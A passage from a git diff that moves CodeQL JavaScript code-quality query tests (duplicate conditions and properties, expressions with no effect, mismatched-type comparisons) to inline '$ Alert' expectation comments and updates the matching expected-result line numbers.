b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref @@ -1 +1,2 @@ -Expressions/DuplicateCondition.ql \ No newline at end of file +query: Expressions/DuplicateCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js index 11a0b8c824de..cce5ff36fcfc 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js @@ -1,7 +1,7 @@ function controller(msg) { if (msg == 'start') start(); - else if (msg == 'start') + else if (msg == 'start') // $ Alert stop(); else throw new Error("Message not understood."); diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref index 5a1301784da4..6c32a22906cd 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref @@ -1 +1,2 @@ -Expressions/DuplicateProperty.ql +query: Expressions/DuplicateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js @@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js index 992f9bc5c8d7..c673055fbf71 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js @@ -3,7 +3,7 @@ var o = { getX: function() { return this.x; - }, + }, // $ Alert setX: function(x) { this.x = x; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref index c63203f1a8ca..c95618b5b331 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref @@ -1 +1,2 @@ -Expressions/DuplicateSwitchCase.ql \ No newline at end of file +query: Expressions/DuplicateSwitchCase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js index aa635dec8bb8..8056a9f0e74d 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js @@ -3,7 +3,7 @@ function controller(msg) { case 'start': start(); break; - case 'start': + case 'start': // $ Alert stop(); break; default: diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..853e781c88e2 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected @@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | -| uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | +| uselessfn.js:1:1:1:26 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref index 83e04904db2a..f4e3458759ba 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Expressions/ExprHasNoEffect.ql \ No newline at end of file +query: Expressions/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..a91759e553f1 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js @@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK /** Useless */ -x; +x; // $ Alert -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, "nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js index e3634673ea58..341644bf6498 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js @@ -1,3 +1,3 @@ -(function f() { +(function f() { // $ Alert console.log("I'm never called."); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..60c9c95e2484 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected @@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:78:31:78:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:78:38:78:41 | null | an expression | +| tst.js:81:35:81:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:81:42:81:45 | null | an expression | +| tst.js:91:5:91:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:91:12:91:15 | null | an expression | +| tst.js:94:9:94:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:94:16:94:19 | null | an expression | +| tst.js:100:5:100:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:100:9:100:13 | "def" | an expression | +| tst.js:107:5:107:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:107:9:107:13 | "def" | an expression | +| tst.js:121:5:121:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:121:13:121:14 | 42 | an expression | +| tst.js:124:5:124:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:124:13:124:17 | "bar" | an expression | +| tst.js:132:5:132:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:132:11:132:14 | "42" | an expression | +| tst.js:133:5:133:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:133:12:133:12 | b | variable 'b' | +| tst.js:134:5:134:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:134:11:134:11 | b | variable 'b' | +| tst.js:138:5:138:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:138:15:138:23 | undefined | 'undefined' | +| tst.js:139:5:139:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:139:19:139:23 | "foo" | an expression | +| tst.js:141:5:141:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:141:13:141:17 | "foo" | an expression | +| tst.js:143:5:143:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:143:18:143:22 | "foo" | an expression | +| tst.js:150:5:150:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:150:12:150:15 | null | an expression | +| tst.js:151:5:151:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:151:14:151:15 | t1 | variable 't1' | +| tst.js:154:5:154:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:154:12:154:15 | null | an expression | +| tst.js:155:5:155:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:155:14:155:15 | t2 | variable 't2' | +| tst.js:158:5:158:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:158:12:158:15 | null | an expression | +| tst.js:159:5:159:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:159:14:159:15 | t3 | variable 't3' | +| tst.js:162:5:162:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:162:12:162:15 | null | an expression | +| tst.js:163:5:163:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:163:14:163:15 | t4 | variable 't4' | +| tst.js:166:5:166:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:166:12:166:15 | null | an expression | +| tst.js:167:5:167:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:167:14:167:15 | t5 | variable 't5' | +| tst.js:170:5:170:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:170:12:170:15 | null | an expression | +| tst.js:171:5:171:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:171:14:171:15 | t6 | variable 't6' | +| tst.js:174:5:174:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:174:12:174:15 | null | an expression | +| tst.js:175:5:175:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:175:14:175:15 | t7 | variable 't7' | +| tst.js:178:5:178:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:178:12:178:15 | null | an expression | +| tst.js:179:5:179:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:179:14:179:15 | t8 | variable 't8' | +| tst.js:192:5:192:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:192:12:192:13 | t4 | variable 't4' | +| tst.js:193:5:193:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:193:12:193:13 | t2 | variable 't2' | +| tst.js:194:5:194:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:194:12:194:13 | t4 | variable 't4' | +| tst.js:195:5:195:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:195:12:195:13 | t3 | variable 't3' | +| tst.js:197:5:197:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:197:12:197:13 | t5 | variable 't5' | +| tst.js:198:5:198:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:198:12:198:13 | t2 | variable 't2' | +| tst.js:199:5:199:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:199:12:199:13 | t5 | variable 't5' | +| tst.js:200:5:200:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:200:12:200:13 | t3 | variable 't3' | +| tst.js:215:13:215:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:215:20:215:24 | "foo" | an expression | +| tst.js:223:5:223:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:223:11:223:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref index 13b0e2a181cb..22ce4796bb35 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.qlref @@ -1 +1,2 @@ -Expressions/HeterogeneousComparison.ql \ No newline at end of file +query: Expressions/HeterogeneousComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js index 82e536676198..0d2af62c7bf6 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/interprocedural.js @@ -8,13 +8,13 @@ // disable the whitelist known = known; unknown = unknown; gotKnown = gotKnown; gotUnknown = gotUnknown; - known === 42; + known === 42; // $ Alert known == 42; gotKnown === 42; gotKnown == 42; - getKnown() === 42; + getKnown() === 42; // $ Alert getKnown() == 42; - getKnown_indirect() === 42; + getKnown_indirect() === 42; // $ Alert getKnown_indirect() == 42; unknown === 42; diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..c441f4834658 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js @@ -1,137 +1,127 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK switch ("hi") { -case 42: +case 42: // $ Alert } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo 